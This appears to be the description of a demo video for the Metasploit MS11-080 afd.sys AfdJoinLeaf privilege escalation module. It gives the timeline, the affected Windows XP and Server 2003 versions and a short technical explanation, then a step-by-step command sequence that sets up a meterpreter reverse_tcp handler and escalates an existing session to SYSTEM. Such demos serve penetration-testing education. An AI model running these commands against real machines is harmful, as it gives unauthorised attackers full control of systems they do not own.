MS11-080 Microsoft Windows AfdJoinLeaf Privilege Escalation Metasploit Demo

Timeline :

Vulnerability reported to Microsoft by Bo Zhou
Coordinated public release of the vulnerability the 2011-10-11
Metasploit PoC provided the 2012-10-02

PoC provided by :

Bo Zhou
Matteo Memelli
Spencer McIntyre

Reference(s) :

MS11-080
CVE-2011-2005

Affected version(s) :

Windows XP Service Pack 3
Windows XP Professional x64 Edition Service Pack 2
Windows Server 2003 Service Pack 2
Windows Server 2003 x64 Edition Service Pack 2

Tested on Windows XP Pro SP3 with :

N/A

Description :

This module exploits a flaw in the AfdJoinLeaf function of the afd.sys driver to overwrite data in kernel space. An address within the HalDispatchTable is overwritten and when triggered with a call to NtQueryIntervalProfile will execute shellcode. This module will elevate itself to SYSTEM, then inject the payload into another SYSTEM process before restoring it’s own token to avoid causing system instability.

Commands :

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit -j

session -i 1
getuid
sysinfo
background

use exploit/windows/local/ms11_080_afdjoinleaf
set SESSION 1
exploit

session -i 2
sysinfo
getuid